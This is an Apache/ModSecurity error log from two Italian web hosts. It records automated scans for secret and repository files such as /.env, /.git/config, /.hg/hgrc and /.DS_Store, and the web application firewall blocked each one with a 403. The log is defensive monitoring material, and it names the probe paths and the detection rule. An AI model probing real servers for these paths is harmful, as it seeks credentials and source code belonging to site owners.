[Sat Mar 23 03:06:12.532775 2024] [:error] [pid 1981940] [client 172.105.16.117:37092] [client 172.105.16.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Zf45FH08TUx7CY82_fLvNQAAAAs"]
[Sat Mar 23 03:06:12.890835 2024] [:error] [pid 1981936] [client 172.105.16.117:37096] [client 172.105.16.117] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zf45FJgdhUG_uaLa46eobwAAAAc"]
[Sat Mar 23 03:06:12.891132 2024] [:error] [pid 1981936] [client 172.105.16.117:37096] [client 172.105.16.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zf45FJgdhUG_uaLa46eobwAAAAc"]
[Sat Mar 23 03:06:12.891353 2024] [:error] [pid 1981936] [client 172.105.16.117:37096] [client 172.105.16.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zf45FJgdhUG_uaLa46eobwAAAAc"]
[Sat Mar 23 03:06:13.282749 2024] [:error] [pid 1981934] [client 172.105.16.117:37100] [client 172.105.16.117] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45FedxrikJATAWA-BmowAAAAU"]
[Sat Mar 23 03:06:13.283404 2024] [:error] [pid 1981934] [client 172.105.16.117:37100] [client 172.105.16.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45FedxrikJATAWA-BmowAAAAU"]
[Sat Mar 23 03:06:13.283968 2024] [:error] [pid 1981934] [client 172.105.16.117:37100] [client 172.105.16.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45FedxrikJATAWA-BmowAAAAU"]
[Sat Mar 23 03:07:06.286196 2024] [:error] [pid 1981900] [client 45.138.16.120:35992] [client 45.138.16.120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45SnLCftlqJ_JlwSw82wAAAAA"]
[Sat Mar 23 03:07:06.286828 2024] [:error] [pid 1981900] [client 45.138.16.120:35992] [client 45.138.16.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45SnLCftlqJ_JlwSw82wAAAAA"]
[Sat Mar 23 03:07:06.287245 2024] [:error] [pid 1981900] [client 45.138.16.120:35992] [client 45.138.16.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zf45SnLCftlqJ_JlwSw82wAAAAA"]
[Sun Mar 24 12:29:12.726506 2024] [:error] [pid 2007208] [client 141.11.197.218:49290] [client 141.11.197.218] ModSecurity: Warning. Matched phrase "/.hg/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.hg/ found within REQUEST_FILENAME: /.hg/hgrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.hg/hgrc"] [unique_id "ZgAOiHPZIq09j5b_-9xhNgAAAAg"]
[Sun Mar 24 12:29:12.727194 2024] [:error] [pid 2007208] [client 141.11.197.218:49290] [client 141.11.197.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.hg/hgrc"] [unique_id "ZgAOiHPZIq09j5b_-9xhNgAAAAg"]
[Sun Mar 24 12:29:12.727661 2024] [:error] [pid 2007208] [client 141.11.197.218:49290] [client 141.11.197.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.hg/hgrc"] [unique_id "ZgAOiHPZIq09j5b_-9xhNgAAAAg"]
[Tue Mar 26 20:43:55.885137 2024] [:error] [pid 2047596] [client 44.200.218.251:44758] [client 44.200.218.251] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgMleyS15N9XhaH2piDbtAAAAAQ"]
[Tue Mar 26 20:43:55.886035 2024] [:error] [pid 2047596] [client 44.200.218.251:44758] [client 44.200.218.251] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgMleyS15N9XhaH2piDbtAAAAAQ"]
[Tue Mar 26 20:43:55.886541 2024] [:error] [pid 2047596] [client 44.200.218.251:44758] [client 44.200.218.251] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgMleyS15N9XhaH2piDbtAAAAAQ"]
[Thu Mar 28 00:06:11.668866 2024] [:error] [pid 2090006] [client 20.19.39.2:57948] [client 20.19.39.2] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgSmYyJ_09unOLAXqDaj9gAAAAA"]
[Thu Mar 28 00:06:11.671520 2024] [:error] [pid 2090006] [client 20.19.39.2:57948] [client 20.19.39.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgSmYyJ_09unOLAXqDaj9gAAAAA"]
[Thu Mar 28 00:06:11.672181 2024] [:error] [pid 2090006] [client 20.19.39.2:57948] [client 20.19.39.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZgSmYyJ_09unOLAXqDaj9gAAAAA"]
[Thu Mar 28 22:54:06.038851 2024] [:error] [pid 2102013] [client 100.26.55.199:35198] [client 100.26.55.199] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZgXm_gd2tKjaI-42FSHqSwAAAAY"]
[Thu Mar 28 22:54:06.039580 2024] [:error] [pid 2102013] [client 100.26.55.199:35198] [client 100.26.55.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZgXm_gd2tKjaI-42FSHqSwAAAAY"]
[Thu Mar 28 22:54:06.040039 2024] [:error] [pid 2102013] [client 100.26.55.199:35198] [client 100.26.55.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZgXm_gd2tKjaI-42FSHqSwAAAAY"]
[Sun Mar 31 13:43:55.284875 2024] [:error] [pid 2163312] [client 193.32.162.87:33256] [client 193.32.162.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZglMezUop63MCM1PY_hbNgAAAAY"]
[Sun Mar 31 13:43:55.286633 2024] [:error] [pid 2163312] [client 193.32.162.87:33256] [client 193.32.162.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZglMezUop63MCM1PY_hbNgAAAAY"]
[Sun Mar 31 13:43:55.287073 2024] [:error] [pid 2163312] [client 193.32.162.87:33256] [client 193.32.162.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZglMezUop63MCM1PY_hbNgAAAAY"]
[Fri Apr 05 14:04:36.516269 2024] [:error] [pid 2273014] [client 89.116.26.31:58006] [client 89.116.26.31] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zg_o1NqZi0hNKs0Q6mN6sQAAAAY"]
[Fri Apr 05 14:04:36.518010 2024] [:error] [pid 2273014] [client 89.116.26.31:58006] [client 89.116.26.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zg_o1NqZi0hNKs0Q6mN6sQAAAAY"]
[Fri Apr 05 14:04:36.518487 2024] [:error] [pid 2273014] [client 89.116.26.31:58006] [client 89.116.26.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zg_o1NqZi0hNKs0Q6mN6sQAAAAY"]
[Wed May 08 09:53:18.308672 2024] [:error] [pid 3051247] [client 193.233.49.207:57990] [client 193.233.49.207] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zjsvbr8b0vAqq5m7MniNWQAAAAI"]
[Wed May 08 09:53:18.310548 2024] [:error] [pid 3051247] [client 193.233.49.207:57990] [client 193.233.49.207] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zjsvbr8b0vAqq5m7MniNWQAAAAI"]
[Wed May 08 09:53:18.310993 2024] [:error] [pid 3051247] [client 193.233.49.207:57990] [client 193.233.49.207] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zjsvbr8b0vAqq5m7MniNWQAAAAI"]
[Sat May 18 21:37:57.443233 2024] [authz_core:error] [pid 3319308] [client 139.162.155.225:37746] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat May 18 21:37:58.435083 2024] [:error] [pid 3319319] [client 139.162.155.225:37778] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZkkDliBg5WQywdrOa720LAAAACw"]
[Sat May 18 21:37:58.435612 2024] [:error] [pid 3319319] [client 139.162.155.225:37778] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZkkDliBg5WQywdrOa720LAAAACw"]
[Sat May 18 21:37:58.436018 2024] [:error] [pid 3319319] [client 139.162.155.225:37778] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZkkDliBg5WQywdrOa720LAAAACw"]
[Sat May 18 21:37:58.489427 2024] [:error] [pid 3319295] [client 139.162.155.225:37788] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZkkDlvd4dRGlaiRMDzLPqgAAABQ"]
[Sat May 18 21:37:58.490004 2024] [:error] [pid 3319295] [client 139.162.155.225:37788] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZkkDlvd4dRGlaiRMDzLPqgAAABQ"]
[Sat May 18 21:37:58.490492 2024] [:error] [pid 3319295] [client 139.162.155.225:37788] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZkkDlvd4dRGlaiRMDzLPqgAAABQ"]
[Sat May 18 21:37:58.641688 2024] [:error] [pid 3319294] [client 139.162.155.225:37800] [client 139.162.155.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDlmiRN9szswPHORjR2QAAABM"]
[Sat May 18 21:37:58.642290 2024] [:error] [pid 3319294] [client 139.162.155.225:37800] [client 139.162.155.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDlmiRN9szswPHORjR2QAAABM"]
[Sat May 18 21:37:58.642742 2024] [:error] [pid 3319294] [client 139.162.155.225:37800] [client 139.162.155.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZkkDlmiRN9szswPHORjR2QAAABM"]
